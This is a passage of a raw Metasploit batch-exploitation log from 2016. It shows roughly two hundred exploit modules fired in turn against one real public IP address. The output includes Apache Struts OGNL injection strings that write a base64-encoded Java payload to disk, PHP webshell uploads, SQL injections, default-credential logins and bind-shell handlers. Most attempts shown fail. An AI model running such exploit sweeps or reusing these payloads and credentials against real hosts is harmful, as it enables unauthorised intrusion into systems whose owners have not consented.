  551. [+] [2016.08.17-21:04:42] Workspace:Seocam Progress:142/337 (42%) [138/332] 166.62.27.177:80 - Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
  552. [-] [2016.08.17-21:04:42] No bind payloads available for exploit/multi/http/horde_href_backdoor)
  553. [-] [2016.08.17-21:04:42] [0138] Exploit failed: A payload has not been selected.
  554. [+] [2016.08.17-21:04:43] Workspace:Seocam Progress:143/337 (42%) [139/332] 166.62.27.177:80 - OP5 license.php Remote Command Execution
  555. [-] [2016.08.17-21:04:43] No bind payloads available for exploit/multi/http/op5_license)
  556. [-] [2016.08.17-21:04:43] [0139] Exploit failed: A payload has not been selected.
  557. [+] [2016.08.17-21:04:43] Workspace:Seocam Progress:144/337 (42%) [140/332] 166.62.27.177:80 - OP5 welcome Remote Command Execution
  558. [-] [2016.08.17-21:04:43] No bind payloads available for exploit/multi/http/op5_welcome)
  559. [-] [2016.08.17-21:04:43] [0140] Exploit failed: A payload has not been selected.
  560. [+] [2016.08.17-21:04:44] Workspace:Seocam Progress:145/337 (43%) [141/332] 166.62.27.177:80 - Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
  561. [-] [2016.08.17-21:04:44] No bind payloads available for exploit/linux/http/symantec_web_gateway_exec)
  562. [-] [2016.08.17-21:04:44] [0141] Exploit failed: A payload has not been selected.
  563. [+] [2016.08.17-21:04:44] Workspace:Seocam Progress:146/337 (43%) [142/332] 166.62.27.177:80 - Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability
  564. [*] [2016.08.17-21:04:44] Using a random high port (3603) for 166.62.27.177
  565. [*] [2016.08.17-21:04:44] [0142] Started bind handler
  566. [+] [2016.08.17-21:04:44] Workspace:Seocam Progress:147/337 (43%) [143/332] 166.62.27.177:80 - Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability
  567. [*] [2016.08.17-21:04:45] Using a random high port (19386) for 166.62.27.177
  568. [*] [2016.08.17-21:04:45] [0143] Started bind handler
  569. [*] [2016.08.17-21:04:45] [0143] Sending PHP payload (qKwtRZA.php)
  570. [+] [2016.08.17-21:04:45] Workspace:Seocam Progress:148/337 (43%) [144/332] 166.62.27.177:80 - Apache Struts Remote Command Execution
  571. [*] [2016.08.17-21:04:45] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  572. [*] [2016.08.17-21:04:45] Using a random high port (10588) for 166.62.27.177
  573. [-] [2016.08.17-21:04:45] [0143] File wasn't uploaded, aborting!
  574. [+] [2016.08.17-21:04:45] Workspace:Seocam Progress:149/337 (44%) [145/332] 166.62.27.177:80 - Apache Struts 2 Developer Mode OGNL Execution
  575. [*] [2016.08.17-21:04:46] Using a random high port (34073) for 166.62.27.177
  576. [*] [2016.08.17-21:04:46] [0145] Started bind handler
  577. [*] [2016.08.17-21:04:46] [0145] Attempting to execute: #f=new java.io.FileOutputStream('8czInHj.jar',false),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('UEsDBBQAAAAAAK6oEUn8OVptFAAAABQAAAAOAAAAbWV0YXNwbG9pdC5kYXRTcGF3bj0yCkxQT1JUPTM0MDczClBLAwQUAAAAAACuqBFJAAAAAAAAAAAAAAAACwAAAG1ldGFzcGxvaXQvUEsDBBQAAAAIAK6oEUlwey3fThEAAEEhAAAYAAAAbWV0YXNwbG9pdC9QYXlsb2FkLmNsYXNzlRgJeBTl9b3Z2Z3ZyeRgwgLDoYiKS05FjLh4NIQg0VywwRhRcdidkJXNTtyZkKDWWkVttfcpVtRSNPawQrSbaNR6tHjUs61ardaztNbWWrV3lb43s0s2yWJpPvjP97/7mn3so7vvA4BjhBoFHoG9EvxOAYHn30vwlgJ+2KvAqfAHBZbC27z9owx/4vkdGf7MN+8y+F8UsOE9Gd7nzQcy/FWGvykwA/7Owz8k+CfP/5Lh3zz/h4cPefhIARH20RsEGZFOUOCNT0ZRRj8vAwpKKBNxDPJWkbGIwVQeimUskbFU')),#f.close()
  578. [*] [2016.08.17-21:04:47] [0145] Attempting to execute: #f=new java.io.FileOutputStream('8czInHj.jar',true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('xjK+nyajJmO5jNNlDMk4Q8KZChyLs/iZTit4T8HZOEfCuTLOI7p4iIyH8tF8BQ/DBTwc7gf3T3pawSPwSKaxMHsE8SA9OUrGsISLgliBlSQ7VklYzZsaBWvxaAmPkXGxjMcyriUSHqfAaqyT8XgZl8p4QhAjuIyHE2U8ScKTmelTZPwEz/UKdOFyCRsUOJf1cy6ukLGRSayU8VQJVykQJx7pvEnC0xTYSAbC0xVIYLOELQpswlYe2mggOel4AQ/tMq6WcY2EUQk7JFwr4Rkydsp4poxdCmzGs3hYx8PZbIi9Mp7DijlXxvVkTzyP9WdIuEGByzEmYVyBK5iuqcBV7BVXYLeEGyXskTEh4fkKXIObFLgakwzfy0OK0Vk89Ml4AYuTltGW0JGwX8LNCmzDAQWuxUFW7hYeLpTxIoa/WMZP8nyJjJ/i+VI2xqclvEyBm5m2iJfTCrcG6fgKluBKGa9iTX5Gxs/yzdU8XCPh5xTYBXsZ7PO0wi/w8Rd59SW+')),#f.close()
  579. [*] [2016.08.17-21:04:47] [0142] 166.62.27.177:80 doesn't look like Symantec Web Gateway, will not engage.
  580. [+] [2016.08.17-21:04:47] Workspace:Seocam Progress:150/337 (44%) [146/332] 166.62.27.177:80 - SugarCRM unserialize() PHP Code Execution
  581. [*] [2016.08.17-21:04:47] [0145] Attempting to execute: #f=new java.io.FileOutputStream('8czInHj.jar',true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('eIeffJmHr/DwVXJs/Bqvvs7DN3j4pozXKhiBD4K4Da/jk28xo9fLuJ3nG2S8UcabZPy2hDsQpLbo+tb6lkYErfl8Y7NRmzRSG2ujTjqR2riMvLy9vmPV+mhjO0KgKbq+vulMBDzL26xoiyIET6s/o379qjbGEDgxkUo4JyP4wovOQBAbrLhJU6+RSCHMCK+bSoDBlMbBmNnnJKyUjTBtIJ1wzMbeDWY8bsZXJpKEYEk472FD0rDtZVMxeScJq5bfEF4JvyPhTuJvg2U5tpM2+hCi4f1QTam+foeemkbv+NO2fmfyaT6JA/BfttF0TkubjYNmrN8xNjDHC8MFQAupVzXi8cZBx0zZJD4x251IxZtSKxLpSVJPELIA1pzchCJlpXuNZOJCYmNB+CAeSPGEbZsxB+GoQuDrCnrFibGka2oVnoZnEKa7MP1OIlnbnrb6zLSTMMmYWq/pGHZf0ko4te3GlqRlxBFmTsa3vD+RjJtpFW/GW1QcwltV/C5+j7yp')),#f.close()
  582. [*] [2016.08.17-21:04:47] Using a random high port (39212) for 166.62.27.177
  583. [+] [2016.08.17-21:04:48] Workspace:Seocam Progress:151/337 (44%) [147/332] 166.62.27.177:80 - Tiki Wiki unserialize() PHP Code Execution
  584. [*] [2016.08.17-21:04:48] Using a random high port (18427) for 166.62.27.177
  585. [*] [2016.08.17-21:04:48] [0147] Started bind handler
  586. [*] [2016.08.17-21:04:48] [0147] Disclosing the path of the Tiki Wiki on the filesystem
  587. [+] [2016.08.17-21:04:48] Workspace:Seocam Progress:152/337 (45%) [148/332] 166.62.27.177:80 - appRain CMF Arbitrary PHP File Upload Vulnerability
  588. [*] [2016.08.17-21:04:48] Using a random high port (7633) for 166.62.27.177
  589. [*] [2016.08.17-21:04:49] [0148] Started bind handler
  590. [*] [2016.08.17-21:04:49] [0148] Sending PHP payload (OBCnNYhB.php)
  591. [-] [2016.08.17-21:04:49] [0147] Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On.
  592. [*] [2016.08.17-21:04:51] [0145] Attempting to execute: #f=new java.io.FileOutputStream('8czInHj.jar',true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('Jsa2VvH7eAtCae04spq44aj4A7xNxR/i7SruYh6UcQOouBteJgSX2H3GAKlVrHF6+1QchldVvAPvJLXn60DFHzEBsSaeSJM8mFFxBO/k1agKz8HzKt6Fd5NnriDJ+sx4Ppkx5vgevBfBH/VI4dFEHO+T8Mcq3o8PqPggPqTiT/CnCCWTBdiDD6v4CPPjW7umGQGI5R7H6bMjKj6KjyEcMVV/Hel+22kxUsZGM+3pB0H/mLui+sZoO60GrDTp/pA8hHTRmIqlt7iRlwMvL3g6K19d+UHCSvqZio/jExI+qeJT+DSFw2T7kmr5SIWX2ChKtYu0z3B6VHwGfy7hL1T8JT6r4nP4rISk7V/hCyq+CM+o8CQ8gVBsm05+bJVOygUS/lrFl/BlFX+Dr0wg37bhfPJrFV/F1yR8XcU38E2EQ8fvW61of6ynxXR6rPj+HESmjPX0WqQsoXJQxd/iXtLK+Jv9cCr+jr3O39zetqaDRFxCf7xd1RalyvV7Fd/CP6j4')),#f.close()
  593. [-] [2016.08.17-21:04:51] [0148] File wasn't uploaded, aborting!
  594. [*] [2016.08.17-21:04:52] [0145] Attempting to execute: #f=new java.io.FileOutputStream('8czInHj.jar',true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('Nv6R7tLGQARhbk6Ly7c4Zn06bWzJS0Iq/gkfIu00Rduqly497oTqY1R8B//MCn43568p06klR1HxL/jeBFvWFHAAFd/HD8ih+m1zpUXpZEY+igYrlSLVuGL8FZ9FmDeFt3wz55TOr6NWbJPpMF9/QwiNH5vpzWZ6/PLvKv4D/6niv/Df5D95rE5wMPLPAcrMHhU7p+iJ6TmXXSblZwLOT02erSk16eOpyHO/DmuTmaJ0SDooyuppfnX1fJIp6pCi2o20QeyZaSKP85n1/6j4Ie5V8SPOCsW5UuQCq/Ai/JrgalXcJ4AqoCDkEhqxt8JwjHyTEq7bcwxRhu2nyraltt1M91LC9ardnIl39cnk+LUq+ASRzDzpedpyPMutsLy6OmsiANfcqNWfjlGoyN0Ur5Ha2topaGKUomsbOE93J2KGQ4I9Lfh5CKiCRMILMr6rCkFBUYUiQaVMzs/7PO3V2KyKGlUoFkrI42mXdiZZY3+hyIucjp60NeCF8H4ztxPY')),#f.close()
  595. [+] [2016.08.17-21:04:53] Workspace:Seocam Progress:153/337 (45%) [149/332] 166.62.27.177:80 - Gitorious Arbitrary Command Execution
  596. [-] [2016.08.17-21:04:53] No bind payloads available for exploit/multi/http/gitorious_graph)
  597. [-] [2016.08.17-21:04:53] [0149] Exploit failed: A payload has not been selected.
  598. [+] [2016.08.17-21:04:53] Workspace:Seocam Progress:154/337 (45%) [150/332] 166.62.27.177:80 - vBSEO proc_deutf() Remote PHP Code Injection
  599. [*] [2016.08.17-21:04:53] Using a random high port (31069) for 166.62.27.177
  600. [*] [2016.08.17-21:04:53] [0150] Started bind handler
  601. [+] [2016.08.17-21:04:54] Workspace:Seocam Progress:155/337 (45%) [151/332] 166.62.27.177:80 - LANDesk Lenovo ThinkManagement Console Remote Command Execution
  602. [*] [2016.08.17-21:04:54] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  603. [*] [2016.08.17-21:04:54] Using a random high port (48805) for 166.62.27.177
  604. [*] [2016.08.17-21:04:54] [0150] Server replied with 404
  605. [*] [2016.08.17-21:04:54] [0151] Started bind handler
  606. [*] [2016.08.17-21:04:56] [0151] Uploading 106944 bytes through /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx...
  607. [+] [2016.08.17-21:04:57] Workspace:Seocam Progress:156/337 (46%) [152/332] 166.62.27.177:80 - Dolibarr ERP/CRM Post-Auth OS Command Injection
  608. [-] [2016.08.17-21:04:57] No bind payloads available for exploit/linux/http/dolibarr_cmd_exec)
  609. [-] [2016.08.17-21:04:57] [0152] Exploit failed: A payload has not been selected.
  610. [+] [2016.08.17-21:04:58] Workspace:Seocam Progress:157/337 (46%) [153/332] 166.62.27.177:80 - WebCalendar 1.2.4 Pre-Auth Remote Code Injection
  611. [-] [2016.08.17-21:04:58] [0151] Upload failed on /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx [404 Not Found]
  612. [-] [2016.08.17-21:04:58] No bind payloads available for exploit/linux/http/webcalendar_settings_exec)
  613. [-] [2016.08.17-21:04:58] [0153] Exploit failed: A payload has not been selected.
  614. [+] [2016.08.17-21:04:59] Workspace:Seocam Progress:158/337 (46%) [154/332] 166.62.27.177:80 - PHP CGI Argument Injection
  615. [*] [2016.08.17-21:04:59] Using a random high port (7153) for 166.62.27.177
  616. [*] [2016.08.17-21:04:59] [0154] Started bind handler
  617. [+] [2016.08.17-21:05:02] Workspace:Seocam Progress:159/337 (47%) [155/332] 166.62.27.177:80 - Active Collab "chat module" Remote PHP Code Injection Exploit
  618. [*] [2016.08.17-21:05:02] Using a random high port (54734) for 166.62.27.177
  619. [+] [2016.08.17-21:05:03] Workspace:Seocam Progress:160/337 (47%) [156/332] 166.62.27.177:80 - PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability
  620. [*] [2016.08.17-21:05:03] Using a random high port (40322) for 166.62.27.177
  621. [*] [2016.08.17-21:05:03] [0156] Started bind handler
  622. [-] [2016.08.17-21:05:04] [0156] Login failed with "admin:volunteer"
  623. [+] [2016.08.17-21:05:06] Workspace:Seocam Progress:161/337 (47%) [157/332] 166.62.27.177:80 - WordPress Asset-Manager PHP File Upload Vulnerability
  624. [*] [2016.08.17-21:05:07] Using a random high port (2127) for 166.62.27.177
  625. [*] [2016.08.17-21:05:08] [0157] Started bind handler
  626. [*] [2016.08.17-21:05:08] [0157] Uploading payload YwDXK.php
  627. [-] [2016.08.17-21:05:08] [0157] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  628. [+] [2016.08.17-21:05:09] Workspace:Seocam Progress:162/337 (48%) [158/332] 166.62.27.177:80 - WordPress WP-Property PHP File Upload Vulnerability
  629. [*] [2016.08.17-21:05:09] Using a random high port (37690) for 166.62.27.177
  630. [*] [2016.08.17-21:05:09] [0158] Started bind handler
  631. [*] [2016.08.17-21:05:09] [0158] Uploading payload TMkcO.php
  632. [-] [2016.08.17-21:05:10] [0158] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  633. [+] [2016.08.17-21:05:10] Workspace:Seocam Progress:163/337 (48%) [159/332] 166.62.27.177:80 - qdPM v7 Arbitrary PHP File Upload Vulnerability
  634. [*] [2016.08.17-21:05:10] Using a random high port (63205) for 166.62.27.177
  635. [+] [2016.08.17-21:05:11] Workspace:Seocam Progress:164/337 (48%) [160/332] 166.62.27.177:80 - Network Shutdown Module (sort_values) Remote PHP Code Injection
  636. [*] [2016.08.17-21:05:11] Using a random high port (62239) for 166.62.27.177
  637. [*] [2016.08.17-21:05:11] [0160] Started bind handler
  638. [*] [2016.08.17-21:05:11] [0160] 166.62.27.177:80 - Sending payload
  639. [-] [2016.08.17-21:05:13] [0145] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  640. [+] [2016.08.17-21:05:14] Workspace:Seocam Progress:165/337 (48%) [161/332] 166.62.27.177:80 - Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution
  641. [*] [2016.08.17-21:05:14] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  642. [*] [2016.08.17-21:05:14] Using a random high port (3191) for 166.62.27.177
  643. [*] [2016.08.17-21:05:14] [0161] Started bind handler
  644. [+] [2016.08.17-21:05:15] Workspace:Seocam Progress:166/337 (49%) [162/332] 166.62.27.177:80 - Nagios XI Network Monitor Graph Explorer Component Command Injection
  645. [*] [2016.08.17-21:05:16] [0161] Uploading 59672 bytes through /CCRWebClient/Wallboard/ImageUpload.ashx...
  646. [-] [2016.08.17-21:05:16] No bind payloads available for exploit/unix/webapp/nagios_graph_explorer)
  647. [+] [2016.08.17-21:05:16] Workspace:Seocam Progress:167/337 (49%) [163/332] 166.62.27.177:80 - Wordpress Front-end Editor File Upload
  648. [*] [2016.08.17-21:05:16] Using a random high port (2649) for 166.62.27.177
  649. [*] [2016.08.17-21:05:16] [0163] Started bind handler
  650. [*] [2016.08.17-21:05:16] [0163] Trying to upload payload
  651. [*] [2016.08.17-21:05:16] [0163] Uploading payload
  652. [-] [2016.08.17-21:05:18] [0163] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Unexpected response, exploit probably failed!
  653. [+] [2016.08.17-21:05:19] Workspace:Seocam Progress:168/337 (49%) [164/332] 166.62.27.177:80 - Basilic 1.5.14 diff.php Arbitrary Command Execution
  654. [-] [2016.08.17-21:05:19] No bind payloads available for exploit/unix/webapp/basilic_diff_exec)
  655. [-] [2016.08.17-21:05:19] [0164] Exploit failed: A payload has not been selected.
  656. [-] [2016.08.17-21:05:19] [0161] Payload upload failed
  657. [+] [2016.08.17-21:05:19] Workspace:Seocam Progress:169/337 (50%) [165/332] 166.62.27.177:80 - Umbraco CMS Remote Command Execution
  658. [*] [2016.08.17-21:05:19] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  659. [*] [2016.08.17-21:05:19] Using a random high port (43260) for 166.62.27.177
  660. [*] [2016.08.17-21:05:20] [0165] Started bind handler
  661. [*] [2016.08.17-21:05:23] [0165] Uploading 50004 bytes through /umbraco/webservices/codeEditorSave.asmx...
  662. [*] [2016.08.17-21:05:23] [0165] Uploading to /umbraco/CxeFxfXMgt.aspx
  663. [*] [2016.08.17-21:05:24] [0165] Didn't get the expected 500 error code /umbraco/webservices/codeEditorSave.asmx [500 Not Found]. Trying to execute the payload anyway
  664. [*] [2016.08.17-21:05:24] [0165] Executing /umbraco/CxeFxfXMgt.aspx...
  665. [-] [2016.08.17-21:05:25] [0165] Execution failed on /umbraco/CxeFxfXMgt.aspx [404 Not Found]
  666. [+] [2016.08.17-21:10:32] Workspace:Seocam Progress:170/337 (50%) [166/332] 166.62.27.177:80 - Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
  667. [*] [2016.08.17-21:10:32] Using a random high port (31248) for 166.62.27.177
  668. [*] [2016.08.17-21:10:32] [0166] Started bind handler
  669. [*] [2016.08.17-21:10:33] [0166] Attempt to login as 'admin:secret'
  670. [-] [2016.08.17-21:10:33] [0166] Unable to login
  671. [+] [2016.08.17-21:10:36] Workspace:Seocam Progress:171/337 (50%) [167/332] 166.62.27.177:80 - WebPageTest Arbitrary PHP File Upload
  672. [*] [2016.08.17-21:10:36] Using a random high port (53040) for 166.62.27.177
  673. [*] [2016.08.17-21:10:36] [0167] Started bind handler
  674. [*] [2016.08.17-21:10:36] [0167] Uploading payload (1609 bytes)...
  675. [*] [2016.08.17-21:10:38] [0167] Requesting /www/results/blah.php
  676. [-] [2016.08.17-21:10:39] [0167] Payload failed to upload
  677. [+] [2016.08.17-21:10:41] Workspace:Seocam Progress:172/337 (51%) [168/332] 166.62.27.177:80 - EGallery PHP File Upload Vulnerability
  678. [*] [2016.08.17-21:10:41] Using a random high port (37156) for 166.62.27.177
  679. [*] [2016.08.17-21:10:41] [0168] Started bind handler
  680. [*] [2016.08.17-21:10:41] [0168] Sending PHP payload (hIQOONEMxleit.php)
  681. [-] [2016.08.17-21:10:42] [0168] File wasn't uploaded, aborting!
  682. [+] [2016.08.17-21:10:45] Workspace:Seocam Progress:173/337 (51%) [169/332] 166.62.27.177:80 - Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection
  683. [-] [2016.08.17-21:10:45] No bind payloads available for exploit/linux/http/symantec_web_gateway_pbcontrol)
  684. [-] [2016.08.17-21:10:45] [0169] Exploit failed: A payload has not been selected.
  685. [+] [2016.08.17-21:10:46] Workspace:Seocam Progress:174/337 (51%) [170/332] 166.62.27.177:80 - Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection
  686. [*] [2016.08.17-21:10:46] Using a random high port (10634) for 166.62.27.177
  687. [*] [2016.08.17-21:10:46] [0170] Started bind handler
  688. [*] [2016.08.17-21:10:46] [0170] Sending SQL injection...
  689. [+] [2016.08.17-21:11:11] Workspace:Seocam Progress:175/337 (51%) [171/332] 166.62.27.177:80 - Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
  690. [*] [2016.08.17-21:11:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  691. [*] [2016.08.17-21:11:12] Using a random high port (34938) for 166.62.27.177
  692. [*] [2016.08.17-21:11:12] [0171] Started bind handler
  693. [*] [2016.08.17-21:11:14] [0171] 166.62.27.177:80 - Uploading 14441 bytes via MySQL...
  694. [-] [2016.08.17-21:11:15] [0171] 166.62.27.177:3306 - Access denied
  695. [-] [2016.08.17-21:11:15] [0171] 166.62.27.177:3306 - That MySQL upload didn't work.
  696. [-] [2016.08.17-21:11:18] [0170] No response from the server
  697. [+] [2016.08.17-21:11:20] Workspace:Seocam Progress:176/337 (52%) [172/332] 166.62.27.177:80 - Cyclope Employee Surveillance Solution v6 SQL Injection
  698. [*] [2016.08.17-21:11:20] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  699. [*] [2016.08.17-21:11:21] Using a random high port (37021) for 166.62.27.177
  700. [+] [2016.08.17-21:11:21] Workspace:Seocam Progress:177/337 (52%) [173/332] 166.62.27.177:80 - CuteFlow v2.11.2 Arbitrary File Upload Vulnerability
  701. [*] [2016.08.17-21:11:21] [0172] Started bind handler
  702. [*] [2016.08.17-21:11:21] Using a random high port (45958) for 166.62.27.177
  703. [*] [2016.08.17-21:11:21] [0173] Started bind handler
  704. [*] [2016.08.17-21:11:21] [0173] Uploading PHP payload (1609 bytes)
  705. [-] [2016.08.17-21:11:22] [0172] Unable to determine the version number
  706. [+] [2016.08.17-21:11:45] Workspace:Seocam Progress:178/337 (52%) [174/332] 166.62.27.177:80 - Oracle Business Transaction Management FlashTunnelService Remote Code Execution
  707. [*] [2016.08.17-21:11:45] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  708. [-] [2016.08.17-21:11:45] No bind payloads available for exploit/windows/http/oracle_btm_writetofile)
  709. [-] [2016.08.17-21:11:45] [0174] Exploit failed: A payload has not been selected.
  710. [+] [2016.08.17-21:11:46] Workspace:Seocam Progress:179/337 (53%) [175/332] 166.62.27.177:80 - XODA 0.4.5 Arbitrary PHP File Upload Vulnerability
  711. [*] [2016.08.17-21:11:46] Using a random high port (8517) for 166.62.27.177
  712. [*] [2016.08.17-21:11:46] [0175] Started bind handler
  713. [*] [2016.08.17-21:11:46] [0175] Sending PHP payload (eiJAglVMTw.php)
  714. [-] [2016.08.17-21:11:52] [0175] File wasn't uploaded, aborting!
  715. [-] [2016.08.17-21:11:53] [0173] Uploading PHP payload failed
  716. [+] [2016.08.17-21:11:55] Workspace:Seocam Progress:180/337 (53%) [176/332] 166.62.27.177:80 - Webmin /file/show.cgi Remote Command Execution
  717. [-] [2016.08.17-21:11:55] No bind payloads available for exploit/unix/webapp/webmin_show_cgi_exec)
  718. [+] [2016.08.17-21:12:00] Workspace:Seocam Progress:181/337 (53%) [177/332] 166.62.27.177:80 - WAN Emulator v2.3 Command Execution
  719. [-] [2016.08.17-21:12:00] No bind payloads available for exploit/linux/http/wanem_exec)
  720. [-] [2016.08.17-21:12:00] [0177] Exploit failed: A payload has not been selected.
  721. [+] [2016.08.17-21:12:01] Workspace:Seocam Progress:182/337 (54%) [178/332] 166.62.27.177:80 - TestLink v1.9.3 Arbitrary File Upload Vulnerability
  722. [*] [2016.08.17-21:12:01] Using a random high port (3166) for 166.62.27.177
  723. [*] [2016.08.17-21:12:01] [0178] Started bind handler
  724. [*] [2016.08.17-21:12:01] [0178] Registering user (HS4JxcpMdzOi)
  725. [+] [2016.08.17-21:12:01] Workspace:Seocam Progress:183/337 (54%) [179/332] 166.62.27.177:80 - E-Mail Security Virtual Appliance learn-msg.cgi Command Injection
  726. [-] [2016.08.17-21:12:01] No bind payloads available for exploit/linux/http/esva_exec)
  727. [-] [2016.08.17-21:12:01] [0179] Exploit failed: A payload has not been selected.
  728. [+] [2016.08.17-21:12:02] Workspace:Seocam Progress:184/337 (54%) [180/332] 166.62.27.177:80 - MobileCartly 1.0 Arbitrary File Creation Vulnerability
  729. [*] [2016.08.17-21:12:02] Using a random high port (23438) for 166.62.27.177
  730. [-] [2016.08.17-21:12:02] [0178] Registration failed
  731. [*] [2016.08.17-21:12:02] [0180] Started bind handler
  732. [*] [2016.08.17-21:12:02] [0180] Uploading payload
  733. [+] [2016.08.17-21:12:02] Workspace:Seocam Progress:185/337 (54%) [181/332] 166.62.27.177:80 - Auxilium RateMyPet Arbitrary File Upload Vulnerability
  734. [*] [2016.08.17-21:12:02] Using a random high port (26244) for 166.62.27.177
  735. [*] [2016.08.17-21:12:02] [0181] Started bind handler
  736. [*] [2016.08.17-21:12:02] [0181] Uploading payload (1636 bytes)...
  737. [*] [2016.08.17-21:12:03] [0180] Requesting 'hsDOv.php'
  738. [*] [2016.08.17-21:12:03] [0181] Requesting 'UtcSi.php'...
  739. [-] [2016.08.17-21:12:04] [0181] Upload unsuccessful: 404
  740. [+] [2016.08.17-21:12:04] Workspace:Seocam Progress:186/337 (55%) [182/332] 166.62.27.177:80 - ZEN Load Balancer Filelog Command Execution
  741. [-] [2016.08.17-21:12:05] No bind payloads available for exploit/linux/http/zen_load_balancer_exec)
  742. [-] [2016.08.17-21:12:05] [0182] Exploit failed: A payload has not been selected.
  743. [+] [2016.08.17-21:12:05] Workspace:Seocam Progress:187/337 (55%) [183/332] 166.62.27.177:80 - Project Pier Arbitrary File Upload Vulnerability
  744. [*] [2016.08.17-21:12:05] Using a random high port (51223) for 166.62.27.177
  745. [*] [2016.08.17-21:12:05] [0183] Started bind handler
  746. [*] [2016.08.17-21:12:05] [0183] Uploading PHP payload (1216 bytes)...
  747. [+] [2016.08.17-21:12:06] Workspace:Seocam Progress:188/337 (55%) [184/332] 166.62.27.177:80 - ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
  748. [*] [2016.08.17-21:12:06] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  749. [*] [2016.08.17-21:12:06] Using a random high port (3205) for 166.62.27.177
  750. [+] [2016.08.17-21:12:07] Workspace:Seocam Progress:189/337 (56%) [185/332] 166.62.27.177:80 - Invision IP.Board unserialize() PHP Code Execution
  751. [*] [2016.08.17-21:12:07] [0184] Started bind handler
  752. [*] [2016.08.17-21:12:07] Using a random high port (33481) for 166.62.27.177
  753. [*] [2016.08.17-21:12:07] [0185] Started bind handler
  754. [*] [2016.08.17-21:12:07] [0185] Exploiting the unserialize() to upload PHP code
  755. [*] [2016.08.17-21:12:07] [0185] Checking for cookie prefix
  756. [-] [2016.08.17-21:12:08] [0184] 166.62.27.177:80 - Unable to select a target, we must bail.
  757. [-] [2016.08.17-21:12:36] [0183] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  758. [+] [2016.08.17-21:12:36] Workspace:Seocam Progress:190/337 (56%) [186/332] 166.62.27.177:80 - PhpTax pfilez Parameter Exec Remote Code Injection
  759. [-] [2016.08.17-21:12:36] No bind payloads available for exploit/multi/http/phptax_exec)
  760. [-] [2016.08.17-21:12:37] [0186] Exploit failed: A payload has not been selected.
  761. [+] [2016.08.17-21:12:37] Workspace:Seocam Progress:191/337 (56%) [187/332] 166.62.27.177:80 - WordPress Plugin Advanced Custom Fields Remote File Inclusion
  762. [*] [2016.08.17-21:12:37] Using a random high port (24887) for 166.62.27.177
  763. [-] [2016.08.17-21:12:37] Fatal: Could not select a callback port when bind connections are specified
  764. [*] [2016.08.17-21:12:37] [0187] Started bind handler
  765. [-] [2016.08.17-21:12:37] [0187] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
  766. [+] [2016.08.17-21:12:38] Workspace:Seocam Progress:192/337 (56%) [188/332] 166.62.27.177:80 - Narcissus Image Configuration Passthru Vulnerability
  767. [-] [2016.08.17-21:12:38] No bind payloads available for exploit/unix/webapp/narcissus_backend_exec)
  768. [-] [2016.08.17-21:12:38] [0188] Exploit failed: A payload has not been selected.
  769. [+] [2016.08.17-21:12:38] Workspace:Seocam Progress:193/337 (57%) [189/332] 166.62.27.177:80 - Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution
  770. [*] [2016.08.17-21:12:38] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  771. [-] [2016.08.17-21:12:38] No bind payloads available for exploit/multi/misc/indesign_server_soap)
  772. [-] [2016.08.17-21:12:38] [0189] Exploit failed: A payload has not been selected.
  773. [-] [2016.08.17-21:12:39] [0185] Exploit failed: NoMethodError undefined method `code' for nil:NilClass
  774. [+] [2016.08.17-21:12:39] Workspace:Seocam Progress:194/337 (57%) [190/332] 166.62.27.177:80 - Ektron 8.02 XSLT Transform Remote Code Execution
  775. [*] [2016.08.17-21:12:39] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  776. [*] [2016.08.17-21:12:39] Using a random high port (54236) for 166.62.27.177
  777. [+] [2016.08.17-21:12:39] Workspace:Seocam Progress:195/337 (57%) [191/332] 166.62.27.177:80 - Foswiki MAKETEXT Remote Command Execution
  778. [*] [2016.08.17-21:12:39] [0190] Started bind handler
  779. [-] [2016.08.17-21:12:40] No bind payloads available for exploit/unix/webapp/foswiki_maketext)
  780. [-] [2016.08.17-21:12:40] [0191] Exploit failed: A payload has not been selected.
  781. [*] [2016.08.17-21:12:40] [0190] Generating the EXE Payload and the XSLT...
  782. [*] [2016.08.17-21:12:40] [0190] Trying to run the xslt transformation...
  783. [+] [2016.08.17-21:12:40] Workspace:Seocam Progress:196/337 (58%) [192/332] 166.62.27.177:80 - TWiki MAKETEXT Remote Command Execution
  784. [-] [2016.08.17-21:12:40] No bind payloads available for exploit/unix/webapp/twiki_maketext)
  785. [-] [2016.08.17-21:12:40] [0192] Exploit failed: A payload has not been selected.
  786. [+] [2016.08.17-21:12:41] Workspace:Seocam Progress:197/337 (58%) [193/332] 166.62.27.177:80 - eXtplorer v2.1 Arbitrary File Upload Vulnerability
  787. [*] [2016.08.17-21:12:41] Using a random high port (55735) for 166.62.27.177
